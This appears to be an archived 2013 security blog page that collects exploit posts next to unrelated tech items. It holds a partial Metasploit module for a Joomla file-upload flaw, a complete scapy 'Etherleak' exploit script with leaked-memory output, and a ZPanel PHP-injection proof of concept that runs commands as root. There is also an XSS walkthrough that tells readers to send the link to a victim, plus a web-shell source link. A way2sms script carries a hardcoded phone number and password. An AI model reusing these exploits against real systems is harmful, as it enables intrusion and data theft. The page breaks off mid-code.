## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => "Joomla Media Manager File Upload Vulnerability", 'Description' => %q{ This module exploits a vulnerability found in Joomla 2.5.x up to 2.5.13, as well as 3.x up to 3.1.4 versions. The vulnerability exists in the Media Manager component, which comes by default in Joomla, allowing arbitrary file uploads, and results in arbitrary code execution. The module has been tested successfully on Joomla 2.5.13 and 3.1.4 on Ubuntu 10.04. Note: If public access isn't allowed to the Media Manager, you will need to supply a valid username and password (Editor role or higher) in order to work properly. }, 'License' => MSF_LICENSE, 'Author' => [ 'Jens Hinrichsen', # Vulnerability discovery according to the OSVDB 'juan vazquez' # Metasploit module ], 'References' => [ [ 'OSVDB', '95933' ], [ 'URL', 'http://developer.joomla.org/security/news/563-20130801-core-unauthorised-uploads' ], [ 'URL', 'http://www.cso.com.au/article/523528/joomla_patches_file_manager_vulnerability_responsible_hijacked_websites/' ], [ 'URL', 'https://github.com/joomla/joomla-cms/commit/fa5645208eefd70f521cd2e4d53d5378622133d8' ], [ 'URL', 'http://niiconsulting.com/checkmate/2013/08/critical-joomla-file-upload-vulnerability/' ] ], 'Payload' => { 'DisableNops' => true, # Arbitrary big number. The payload gets sent as POST data, so # really it's unlimited 'Space' => 262144, # 256k }, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Joomla 2.5.x <=2.5.13', {} ] ], 'Privileged' => false, 'DisclosureDate' => "Aug 01 2013", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The base path to Joomla', '/joomla']), OptString.new('USERNAME', [false, 'User to login with', '']), OptString.new('PASSWORD', [false, 'Password to login with', '']), ], self.class) end def peer return "#{rhost}:#{rport}" end def check res = get_upload_form if res and res.code == 200 if res.body =~ /You are not authorised to view this resource/ print_status("#{peer} - Joomla Media Manager Found but authentication required") return Exploit::CheckCode::Detected elsif res.body =~ /
15 August 2013
[Metasploit] Joomla Media Manager File Upload Vulnerability
12 June 2013
Cisco ASA Ethernet Information Leak
#!/usr/bin/env python # CVE-2003-0001 'Etherleak' exploit # ================================= # Exploit for hosts which use a network device driver that pads # ethernet frames with data which vary from one packet to another, # likely taken from kernel memory, system memory allocated to # the device driver, or a hardware buffer on its network interface # card. Exploit uses scapy with either ICMP or ARP requests as # this can trigger with either but ICMP can hit layer3 filtering # rules. Using ARP the padding appears to leak only fixed constant # values when exploited, ICMP leaks random bytes. # # root@bt:~/0d# python cve-2003-0001.py x.x.x.254 icmp leaky # WARNING: No route found for IPv6 destination :: (no default route?) # [ CVE-2003-0001 'Etherleak' exploit # [ Attacking x.x.x.254 for icmp padding saved to leaky.hex # ............................................................^C!Killing # !Killing # root@bt:~/0d# hexdump -C leaky | head # 00000000 e6 bd a6 9b 90 eb 44 f5 18 a5 29 2a 16 5a 08 ff |......D...)*.Z..| # 00000010 43 e1 23 07 8f 96 5a 24 3f 3d 33 7d b4 97 7e 18 |C.#...Z$?=3}..~.| # 00000020 05 c9 7c 2c a5 c0 fa 7a 76 f3 51 c0 fe 07 72 32 |..|,...zv.Q...r2| # 00000030 9e ad 6a 67 ad 43 58 17 60 43 bc 2b b8 fb cc 70 |..jg.CX.`C.+...p| # 00000040 99 92 80 84 03 03 6f 8f 18 d3 5b 5e f0 1e 3a 83 |......o...[^..:.| # 00000050 3d 82 e7 cd 3e 1f 31 74 b0 06 8c a2 7e 14 6b fb |=...>.1t....~.k.| # 00000060 72 9b ac 64 74 9b a4 d9 23 5b 92 82 0d 0b 31 f0 |r..dt...#[....1.| # 00000070 a9 4f dd 3f bf 2b 5c 67 6c 22 fa da d0 2b d6 39 |.O.?.+gl"...+.9| # 00000080 40 58 13 4f 3d bb 48 03 d3 53 3c 5c 44 d2 3d b2 |@X.O=.H..S# 00000090 4f f2 a9 4a 02 80 4e 1b 6c bd 69 89 bd 76 1b 0a |O..J..N.l.i..v..| # # This issue has been resolved in ASA Cisco Bug reference # is CSCua88376 and PSIRT-0669464365. # # -- prdelka # import os import sys import signal import binascii from scapy.all import * def signalhandler(signal,id): print "!Killing" sys.exit(0) def spawn(host,type): if type == 'arp': send(ARP(pdst=host),loop=1,nofilter=1) elif type == 'icmp': send(IP(dst=host)/ICMP(type=8)/'x',loop=1,nofilter=1) if __name__ == "__main__": print "[ CVE-2003-0001 'Etherleak' exploit" signal.signal(signal.SIGINT,signalhandler) if len(sys.argv) < 4: print "[ No! Use with " sys.exit(1) type = sys.argv[2] if type == 'arp': pass elif type == 'icmp': pass else: print "Bad type!" sys.exit(0) pid = os.fork() if(pid): print "[ Attacking %s for %s padding saved to %s.hex" % (sys.argv[1],sys.argv[2],sys.argv[3]) spawn(sys.argv[1],sys.argv[2]) while True: if type == 'arp': myfilter = "host %s and arp" % sys.argv[1] elif type == 'icmp': myfilter = "host %s and icmp" % sys.argv[1] x = sniff(count=1,filter=myfilter,lfilter=lambda x: x.haslayer(Padding)) p = x[0] if type == 'arp': pad = p.getlayer(2) if type == 'icmp': pad = p.getlayer(4) leak = str(pad) hexfull = binascii.b2a_hex(leak) file = "%s.hex"%sys.argv[3] fdesc = open(file,"a") fdesc.write(hexfull + " ") fdesc.close() # 32 bits leaked here for me. if type == 'icmp': bytes = leak[9:13] elif type == 'arp': bytes = leak[10:14] fdesc = open(sys.argv[3],"ab") fdesc.write(bytes) fdesc.close()
13 May 2013
19 April 2013
ZPanel Code Execution
Hi all,
There's an arbitrary (PHP) code execution in ZPanel, a free and open-source shared hosting control panel. Using the included zsudo binary, access can be escalated and commands can be run as root.
The vulnerability :
ZPanel uses a poor "templater" system that basically consists of a few str_replace calls and an eval... and as could be expected from something like this, it does a very poor job at preventing malicious code. The relevant code can be seen here :
(note the poor attempt at stripping out tags).
By effectively injecting the replacement that occurs in line 71, one can run arbitrary PHP code. When combined with ZPanels `zsudo` binary, one can execute arbitrary commands as root, with a maximum of 5 additional arguments (aside from the path to the to-be-executed-command).
The scope: Custom templates/themes can be uploaded by resellers and administrators. This effectively means that anyone that can get access to a reseller account through any means, including by purchasing a reseller service from a ZPanel-using host, can gain root access,
without detection.
PoC :
Insert the following code anywhere in master.ztml or any other template that is parsed by the template parser, replacing 'touch derp' with any command of choice :
<& bogus']; exec("/etc/zpanel/panel/bin/zsudo touch /root/derp"); echo
$value['bogus &>
Strangely, login.ztml does not appear to use the templater, and seems to allow PHP execution by simply using tags (which I would consider a vulnerability in itself, but that aside).
Vendor notification: I have warned the ZPanel development team about their insecure templater *months* ago, and explicitly pointed out that their "PHP code filtering" was not going to work well. I have submitted a patch for some other fixable aspects of the templater (which was merged into the main repository), but the development team insisted that the security in the templater was fine, and that it wasn't a problem, basically telling me that they were not going to change it. They have not fixed this vulnerability, nor do they appear to have any interest in doing so in the near future.
How to solve it: Either remove the reseller template uploading functionality (this would impair core functionality), or use a real templating engine that does not use a few str_replace() calls strung together in front of an eval().
I'm quite new to this list, and not exactly a pentesting expert, so if I left out some important information in the above message, please do let me know.
- Sven Slootweg
18 April 2013
Samsung Developer Competition 2013
Samsung menggelar rangkaian acara Samsung Developer Competition 2013. Sebuah acara untuk menjembatani pemain di industri mobile, ahli di bidang produk mobile dan juga para pengembang aplikasi. Tujuannya adalah agar para pengembang bisa melihat apa saja kebutuhan industri yang bisa dipenuhi dengan aplikasi mobile.
Acara kompetisi ini telah dimulai dengan rangkaian workshop dan seminar ke berbagai kampus. Untuk gelaran pertama telah dilaksanakan di Universitas Indonesia pada tanggal 2 – 4 April 2013 dan dilanjutkan ke Universitas Bina Nusantara 8 – 10 April 2013. Workshop selanjutnya akan diadakan pada tanggal 24 – 26 April 2013 di Universitas Budi Luhur.
Acara kompetisi ini telah dimulai dengan rangkaian workshop dan seminar ke berbagai kampus. Untuk gelaran pertama telah dilaksanakan di Universitas Indonesia pada tanggal 2 – 4 April 2013 dan dilanjutkan ke Universitas Bina Nusantara 8 – 10 April 2013. Workshop selanjutnya akan diadakan pada tanggal 24 – 26 April 2013 di Universitas Budi Luhur.
Ajang kompetisi aplikasi Samsung ini terbuka bagi semua kalangan pengembang aplikasi, baik yang pemula, menengah atau yang sudah profesional. Aplikasi-aplikasi yang dilombakan akan difilter melalui tiga kategori: lifestyle, health dan social. Tidak hanya itu, masing-masing kategori akan didukung oleh pemain besar di industri, seperti kategori lifestyle yang didukung Mitra Adi Perkasa (MAP), kategori health yang didukung Nutrifood dan kategori sosial yang akan didukung oleh PNPM (Program Nasional Pemberdayaan Masyarakat).
Samsung menyiapkan 30 Paket hadiah, masing-masing uang senilai 2,5 juta rupiah dan 1 Galaxy Tab 10.1″, untuk 30 finalis (10 aplikasi terbaik di setiap kategori). Selain itu, Juara pertama juga akan mendapatkan uang tunai sebesar 25 juta rupiah dan 3 perangkat terbaru Samsung, diikuti juara kedua mendapatkan uang tunai 15 juta rupiah dan 2 perangkat terbaru samsung serta juara ketiga mendapatkan uang tunai 10 juta rupiah dan 1 perangkat terbaru Samsung.
Untuk pendaftaran kompetisi bisa menuju Tautan ini. Sedangkan informasi jadwal workshop yang akan di gelar di kota, Bandung, Surabaya, Yogyakarta dan Malang akan diumumkan kemudian. Tunggu informasi selanjutnya di Trenologi.
Untuk pendaftaran kompetisi bisa menuju Tautan ini. Sedangkan informasi jadwal workshop yang akan di gelar di kota, Bandung, Surabaya, Yogyakarta dan Malang akan diumumkan kemudian. Tunggu informasi selanjutnya di Trenologi.
30 March 2013
Analisa tentang Tools Adwind ( Adwind Web Fake ) yang berbentuk *.jar
Saya kurang begitu tau tentang kapan dan dimana pertama kali software ini di Release.
pertama kali saya mendengar software ini dr teman yang namanya tidak bisa saya sebutkan. Teman saya bertanya
MyFriends : man, lo udah tau belum tentang soft "Adwind Web Fake"?
Me : wew, itu tools apa kk???
MyFriends : Tools itu semacam tools untuk membuat web Fake dimana Attacker dapat memalsukan alamat website dan attacker juga bisa menambahkan beberapa
command/perintah tertentu untuk melakukan injeksi ke pc Target yg akan melakukan klik terhadap link yg telah kita palsukan.
Me : wah toolsnya keren yah ^_^
MyFriends : Iya sih keren tp pas gw scan di virustotal.com
hasilnya malah mengandung virus semua hakhakhakhak...99x
Me : wkwowkwowkwowkwwkwkw,...yg mana sih toolsnya coba liat. gw penasaran.
MyFriends : nih linknya http://uppit.com/15iuehf89idu/adwind_web_fake.zip
coba lu bongkar kali ajah lo nemu harta karun di dalam hakhakhakhak...99x
Me : Ibih,...boro² harta karun yg ada gw malah kena marah sm Liena -_-"
MyFriends : hakhakhakhak...99x itulah gunanya elu,...siapa lg coba yg bisa tolongin gw :D
Me : ah,...taek lo. bahasa² kayak gini nih yg paling gw benci hahahhaha :p
MyFriends : hakhakhakhakhak...99x
Me : Ok...nanti gw kasih kabar.
Singkat cerita setelah toolsnya sudah gw download gw langsung mulai lihat² toolsnya. ternyata filenya dalam bentuk *.jar -_-
ok gw lmulai dr klik kanan -> properties => truss gw liat² apa ajah keterangan² yag ada di situ....hmmm sepertinya tidak ada yang menarik di sini.
Kayaknya gw harus pake tools kesayangan gw buat liat filenya :D
Nama Toolsnya "FileAnalyzer" (Kalau ga tau nanti gw kasih filenya ^_^ )
setelah gw buka,...tadaaaaaaaa !!!
Oke kayaknya sudah cukup untuk liat² filenya ^_^
sekarang kita coba bongkar, seperti apa sih Algoritma dari tools Gadungan ini :p
tapi pake yah???
Kasi tau ga yah?????
kasi tau ga yah?????
kita coba pake tools seadanya saja :)
gimana kalo kita coba pake 7Zip ^_^
Jangan bilang lo kaget waktu baca tulisan 7Zip !!! ( Ga sah kaget biasa aja lageeee :D )
Dari beberapa gambar ini kita sudah bisa memperkirakan seperti apa cara kerja tools gadungan ini :)
apalagi ada file dengan tulisan "stub.dll" wakakkakakkkk (kalian pasti tau itu file apa ^_^ )
untuk analisa selanjutnya saya serahkan kepada kalian yang membaca Tulisan ini ^_^
Oh iya untuk gambaran tentang Tools aslinya bisa berkunjung ke sini
Semoga tulisan ini bermanfaat dan berguna buat teman² yang suka "klik link" atau download file sembarangan di internet tanpa tau itu link atau file apa :)
Saran dan Kesimpulan :
- Link atau file apapun yang ingin kita donwload di melalui media internet, sebaiknya di cek dulu melalu web scanner link/file seperti https://www.virustotal.com/
- Sebaiknya ubah atau ganti ekstensi file² penting yang ada di PC/Laptop/Penyimpanan Eksternal Anda dengan ekstensi yang cukup mudah untuk anda ingat. sehingga ketika PC/Laptop anda terkena virus, file² tersebut tidak akan rusak. Contoh : file dengan extensi *.Docx => *.DDDDDD atau file *.rar => *.rrr ; terserah kalian mau pake karakter apa yang terpenting selalu beri inisial awal dr ektensi tersebut ("*.D" untuk Docx / "*.r" untuk rar).
- Segala bentuk kejahatan yang terjadi bukan karena ada niat pelakunya, tapi karena adanya kesempatan. WASPADALAH,....WASPADALAH wkwwkwowwkowwkwowkkk =)) =))
Sampai Ketemu di Tulisan saya berikutnya (Kalau ada niat buat nulis/ngetik ) ^_^
10 March 2013
SyRiAn Sh3ll V7
Source Lengkap bisa diambil di sini http://pastebin.com/vsnFhkyB
Baca Selengkapnya...
SyRiAn Sh3ll V7
09 March 2013
Google Fusion Tables Cross Site Scripting
# Title: Google Fusion Tables XSS (HTML Injection) Vulnerability
# Release Date: 07/03/2013
# Author: Junaid Hussain - [ illSecure Research Group ]
# Contact: illSecResearchGroup@Gmail.com | Website: http://illSecure.com
# Vulnerable Application: https://www.google.com/fusiontables/DataSource?dsrcid=implicit
//##### Process:
1. go to https://www.google.com/fusiontables/DataSource?dsrcid=implicit
2. Click "Create empty table" and then click "Next"
3. Click the drop down menu on the Cards1 tab
4. Select "Change Card Layout" and then go to the Custom Tab
5. Remove the HTML code add the following code into the box:
Baca Selengkapnya...
Google Fusion Tables Cross Site Scripting
6. Click save & then Click the share button (top right) and make the link public 7. Click the drop down menu on the Cards1 tab and select the Publish Option 8. Send the Publish Link to victim. --------------------------------------------------------------------------------------- //##### Proof Of Concept: PoC: https://www.google.com/fusiontables/embedviz?viz=CARD&q=select+*+from+19VGTDJasS8NJlbbqnsiDFA_qH7Q95e2dTOKd5RU&tmplt=1&cpr=2 Video: http://www.youtube.com/watch?v=OMCJQ8Atkek&feature=youtu.be --------------------------------------------------------------------------------------- Contact: illSecResearchGroup@gmail.com - Junaid Hussain http://www.illsecure.com --------------------------------------------------------------------------------------- Original: http://www.illsecure.com/2013/03/exclusive-google-fusion-tables-xss-html.html ---------------------------------------------------------------------------------------Click here to continue
04 March 2013
Learning Whitehat Hacking and Penetration Testing 2012
Infinite Skills - Learning Whitehat Hacking and Penetration Testing 2012 | Size 1.35 GB
SKU: 01724 | Duration: 10.5 hours - 103 lessons | Date Released: 2012-10-05
Works on: Windows PC or Mac | Format: DVD and Download | Instructor: Ric Messier
In this Ethical Hacking - Whitehat Hacking and Penetration testing training course, expert Ric Messier covers the essentials you will need to know to harden and protect your hardware and software to avoid downtime and loss of data. Protecting your networks and customer data are more important that ever, and understanding HOW you are vulnerable is the best way to learn how you can prevent attacks.
Some of the topics covered in this course are; researching and background information retrieval, networking fundamentals, a deeper look at TCP/IP and packets, as well as understanding cryptography. You will learn about scanning networks, penetration testing and the use of Metasploit, malware and viruses, DoS and DDoS attacks, web application hacking and securing wireless networks. Finally, you will learn about detection evasion and preventing programming attacks, and much more throughout this video based tutorial.
By the time you have completed this video tutorial for Whitehat Hacking and Penetration testing, you will have a deeper understanding of the areas you may be potentially be vulnerable to attack in, as well as the methods that hackers use to exploit your systems, allowing you to better understand how to secure your hardware and data from unethical hackers.
Download :
From Rapidgator
Computer Hacking Forensic Investigator v8 (Slides)

File Computer Hacking Forensic Investigator v8 (Slides) :
25 February 2013
Blackberry GSM codes
The following are codes that you can use on a BlackBerry. Most require you to hold down the ALT key whilst typing the letters after the + sign (they don't need to be capitals). IMEI number Shows your device's international mobile equipment identity (IMEI - your serial number) on-screen. Type "*#06#" (home screen or call screen. Home Screen ALT(left)+Shift(right)+Del - Restart the Blackberry (only for full-keyboard Blackberries) ALT + JKVV - Display cause of PDP reject ALT + CAP + H - Displays the Help Me screen ALT + EACE - Displays the Help Me screen ALT + ESCR - Displays the Help Me screen ALT + NMLL - Switches the signal strength from bars to a numeric value. ALT + LGLG - Displays the Java event log. Soft reset Performs a "soft" reset of your device; Press-and-hold "Alt", then press-and-hold (left) "shift", then press-and-hold "Del". Hard reset The first step in troubleshooting a network, software or hardware error is often to perform a hard reset. With Java® based devices, this is accomplished by removing the battery, while the BlackBerry device is powered on. Hold the battery out for about 30 seconds, and replace. The BlackBerry device will reboot. Note: A hard reset on a C++ based device is accomplished by pressing the Reset button. Note: To perform a hard reset on a RIM models 850, 857, 950, or 957 device, insert the end of a paperclip inside the small hole on the back of the handheld. The following should work on some version, but on the blackberry I had they didn't work. Enterprise Activation (Options->Advanced) ALT+CNFG - Settings for Enterprise Activation Address Book ALT+VALD - Validate the data structure and look for inconsistencies ALT+RBLD - Force a data structure rebuild from the Options menu, type the following (No ALT+ required) RSET - Will prompt to erase & reload for a reload of the Address book from the BES (n.b. this will wipe all entries, but you can goto SIM Phone Book & copy entries back afterwards) Browser ALT+RBVS - View web page source code T - Top of page (in browser) B - Bottom of page (in browser) Space - Page down (in browser) U - Switch between hide/unhide in title bar (in browser) Calendar Open up a Calendar item ALT+VIEW Inside any Calendar item Show extra info for a Calendar event (including message ID - handy for BES log troubleshooting) from the Options menu, type the following (No ALT+ required) SYNC - Enable Calendar slow sync RSET - Will prompt for a reload of the calendar from the BES RCFG - Request BES configuration SCFG - Send device configuration DCFG - Get CICAL configuration SUPD - Enable detailed Cal. report for backup SUPS - Disable detailed Cal. report for backup SUPN - Disable Cal. report database LUID - Enable view by UID SRSL - Show Reminder status log Messaging ALT+VIEW - For messages, displays the RefId and FolderId for that particular message. For PIM items, displays only the RefId. Search Application ALT+ADVM Search Application Enabled Advanced Global Search WLAN (WLAN wizard screen) ALT-SMON WLAN - Enable simulated Wizard mode ALT-SMOF WLAN - Disable simulated Wizard mode Theme (from theme menu) ALT+THMN - Change to no theme (B&W) ALT+THMD - Change to default theme Date/Time (Date/Time menu - No ALT+ required) LOLO - Date/Time Show Network time values SIM Card (Options->Advanced->SIM card - No ALT+ required) MEPD - Display MEP info MEP1 - Disable SIM personalization MEP2 - Disable Network personalization MEP3 - Disable Network subset personalization MEP4 - Disable Service provider personalization MEP5 - Disable Corporate personalization Status (Options->Status) BUYR - Data & Voice Usage TEST - start a device test (Keyboard, GPS, RF, Audio (Handset,headset,bluetooth, Misc) Shortcuts A or C = phonebook S = search F = phone profiles W or B = browser H = help K = locks the keys L = calendar V = messages M = messages folder R = alarm T = tasks U = calculator I = applications O = options P = phone. D = Memo pad MYVER - Displays your devices model number and software version. LD - Displays the local date LT - Displays the local time MYSIG - Displays the information you entered in the BlackBerry Options > Owner screen MYPIN - Displays your devices PIN Press and hold 'ALT' and left 'CAPS' key then press the 'Return' key. Brings up Language selection list, which you can scroll through and change.
RethinkDB (ReQL) The Next Generation NoSQL systems
Seperti dikutip dihalam webnya http://www.rethinkdb.com/ "RethinkDB is built to store JSON documents, and scale to multiple machines with very little effort. It has a pleasant query language that supports really useful queries like table joins and group by, and is easy to setup and learn." ReQL merupakan Next Generasi NoSQL System Database dimana system ini berbeda dengan MongoDB dan system NoSQL Lainnya. berikut penjelasan RethinkDB mengenai perbedaan mereka dengan system database lainnya Cek Dis Aut Web ini juga menyediakan pengenalan syntax untuk ReQL yang bisa dilihat di sini => Click Me! Untuk lebih jelasnnya mengenai RethinkDB bisa dilihat disini RethinkDB
24 January 2013
way2sms.py (way2sms.com)
''' Created on 22-Jan-2013 @author: abhi ''' import httplib,urllib from urlparse import urlparse headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0','Referer': 'http://site3.way2sms.com/'} username = '7676580202' password = 'pianist' def open_way2sms_com(): conn = httplib.HTTPConnection("www.way2sms.com") conn.request("GET","/") res = conn.getresponse() location = res.getheader('location') return location def follow_redirection(url): k = urlparse(url) conn = httplib.HTTPConnection(k.netloc) conn.request("GET",'/') res = conn.getresponse() headers['Referer'] = url def open_prehome(url): k = urlparse(url) conn = httplib.HTTPConnection(k.netloc) conn.request("GET",'/content/prehome.jsp',None,headers) res = conn.getresponse() cookie = res.getheader('Set-Cookie','cookie') headers.update({'Cookie':cookie.split(';')[0]}) headers['Referer'] = 'http://'+k.netloc+'/content/prehome.jsp' def open_homepage(url): ''' GET /content/index.html HTTP/1.1 Host: site3.way2sms.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://site3.way2sms.com/content/prehome.jsp Cookie: JSESSIONID=A01~D7890988F6C7DC4BC7D88904D188A460.w801 Connection: keep-alive ''' k = urlparse(url) conn = httplib.HTTPConnection(k.netloc) conn.request("GET",'/content/index.html',None,headers) res = conn.getresponse() headers['Referer'] = 'http://'+k.netloc+'/content/index.html' def do_login(u,p,url): ''' POST /Login1.action HTTP/1.1 Host: site3.way2sms.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://site3.way2sms.com/content/index.html Cookie: JSESSIONID=A01~D7890988F6C7DC4BC7D88904D188A460.w801 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 62 username=7676580202&password=pianist&userLogin=no&button=Login ''' paramsdict = {'username':u,'password':p,'userLogin':'no','button':'Login'} params = urllib.urlencode(paramsdict) k = urlparse(url) conn = httplib.HTTPConnection('') conn.request("POST",url+'Login1.action',params,headers) res = conn.getresponse() print res.msg print res.read() def direct_login(): ''' POST /Login1.action HTTP/1.1 Host: site3.way2sms.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://site3.way2sms.com/content/index.html Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 62 ''' u = '7676580202' p = 'pianist' mheaders = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','Accept-Language': 'en-US,en;q=0.5','Accept-Encoding': 'gzip, deflate','Referer': 'http://site3.way2sms.com/content/index.html','Connection': 'keep-alive','Content-Type': 'application/x-www-form-urlencoded','Content-Length': 62} paramsdict = {'username':u,'password':p,'userLogin':'no','button':'Login'} params = urllib.urlencode(paramsdict) conn = httplib.HTTPConnection('') conn.request("POST",'http://site3.way2sms.com/Login1.action',params,mheaders) res = conn.getresponse() print res.msg print res.read() if __name__ == '__main__': #location = open_way2sms_com() #follow_redirection(location) #open_prehome(location) #open_homepage(location) #do_login(username,password,location) direct_login()
23 January 2013
remote control commands to the Samsung tv over LAN
#! /usr/bin/python # Title: samsungremote.py # Author: Asif Iqbal # Date: 05APR2012 # Info: To send remote control commands to the Samsung tv over LAN # TODO: import socket import base64 import time, datetime #IP Address of TV tvip = "" #get_settings('tvip') #IP Address of TV myip = "" #get_settings('myip') #Used for the access control/validation, but not after that AFAIK mymac = "00-0c-29-3e-b1-4f" #get_settings('mymac') #What the iPhone app reports appstring = "iphone..iapp.samsung" #Might need changing to match your TV type tvappstring = "iphone.UE55C8000.iapp.samsung" #What gets reported when it asks for permission remotename = "Python Samsung Remote" # Function to send keys def sendKey(skey, dataSock, appstring): messagepart3 = chr(0x00) + chr(0x00) + chr(0x00) + chr(len( base64.b64encode(skey))) + chr(0x00) + base64.b64encode(skey); part3 = chr(0x00) + chr(len(appstring)) + chr(0x00) \ + appstring + chr(len(messagepart3)) + chr(0x00) + messagepart3 dataSock.send(part3); # Open Socket sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((tvip, 55000)) # Key Reference # Normal remote keys #KEY_0 #KEY_1 #KEY_2 #KEY_3 #KEY_4 #KEY_5 #KEY_6 #KEY_7 #KEY_8 #KEY_9 #KEY_UP #KEY_DOWN #KEY_LEFT #KEY_RIGHT #KEY_MENU #KEY_PRECH #KEY_GUIDE #KEY_INFO #KEY_RETURN #KEY_CH_LIST #KEY_EXIT #KEY_ENTER #KEY_SOURCE #KEY_AD #KEY_PLAY #KEY_PAUSE #KEY_MUTE #KEY_PICTURE_SIZE #KEY_VOLUP #KEY_VOLDOWN #KEY_TOOLS #KEY_POWEROFF #KEY_CHUP #KEY_CHDOWN #KEY_CONTENTS #KEY_W_LINK #Media P #KEY_RSS #Internet #KEY_MTS #Dual #KEY_CAPTION #Subt #KEY_REWIND #KEY_FF #KEY_REC #KEY_STOP # Bonus buttons not on the normal remote: #KEY_TV #Don't work/wrong codes: #KEY_CONTENT #KEY_INTERNET #KEY_PC #KEY_HDMI1 #KEY_OFF #KEY_POWER #KEY_STANDBY #KEY_DUAL #KEY_SUBT #KEY_CHANUP #KEY_CHAN_UP #KEY_PROGUP #KEY_PROG_UP # First configure the connection ipencoded = base64.b64encode(myip) macencoded = base64.b64encode(mymac) messagepart1 = chr(0x64) + chr(0x00) + chr(len(ipencoded)) \ + chr(0x00) + ipencoded + chr(len(macencoded)) + chr(0x00) \ + macencoded + chr(len(base64.b64encode(remotename))) + chr(0x00) \ + base64.b64encode(remotename) part1 = chr(0x00) + chr(len(appstring)) + chr(0x00) + appstring \ + chr(len(messagepart1)) + chr(0x00) + messagepart1 sock.send(part1) messagepart2 = chr(0xc8) + chr(0x00) part2 = chr(0x00) + chr(len(appstring)) + chr(0x00) + appstring \ + chr(len(messagepart2)) + chr(0x00) + messagepart2 sock.send(part2) # Now send the keys as you like, e.g., #sendKey("KEY_VOLUP",sock,tvappstring) #time.sleep(1) #sendKey("KEY_TOOLS",sock,tvappstring) #time.sleep(1) #sendKey("KEY_RIGHT",sock,tvappstring) #time.sleep(1) #sendKey("KEY_DOWN",sock,tvappstring) #time.sleep(1) #sendKey("KEY_RIGHT",sock,tvappstring) # Close the socket when done #sock.closet() ### Attempt to make a samsung control ### def key_0(): try: sendKey("KEY_0",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key 0, DEBUG') def key_1(): try: sendKey("KEY_1",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key 1, DEBUG') def key_2(): try: sendKey("KEY_2",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key 2, DEBUG') def key_3(): try: sendKey("KEY_3",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key 3, DEBUG') def key_4(): try: sendKey("KEY_4",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key 4, DEBUG') def key_5(): try: sendKey("KEY_5",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key 5, DEBUG') def key_6(): try: sendKey("KEY_6",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key 6, DEBUG') def key_7(): try: sendKey("KEY_7",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key 7, DEBUG') def key_8(): try: sendKey("KEY_8",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key 8, DEBUG') def key_9(): try: sendKey("KEY_9",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key 9, DEBUG') def key_up(): try: sendKey("KEY_UP",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key up, DEBUG') def key_down(): try: sendKey("KEY_DOWN",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key 9, DEBUG') def key_left(): try: sendKey("KEY_LEFT",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key left, DEBUG') def key_right(): try: sendKey("KEY_RIGHT",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key right, DEBUG') def key_menu(): try: sendKey("KEY_MENU",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key menu, DEBUG') def key_prech(): try: sendKey("KEY_PRECH",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key menu, DEBUG') def key_guide(): try: sendKey("KEY_GUIDE",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key menu, DEBUG') def key_info(): try: sendKey("KEY_INFO",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key menu, DEBUG') def key_return(): try: sendKey("KEY_RETURN",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key menu, DEBUG') def key_ch_list(): try: sendKey("KEY_CH_LIST",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key menu, DEBUG') def key_exit(): try: sendKey("KEY_EXIT",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key exit, DEBUG') def key_enter(): try: sendKey("KEY_ENTER",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key enter, DEBUG') def key_source(): try: sendKey("KEY_SOURCE",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key source, DEBUG') def key_ad(): try: sendKey("KEY_AD",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key AD, DEBUG') def key_play(): try: 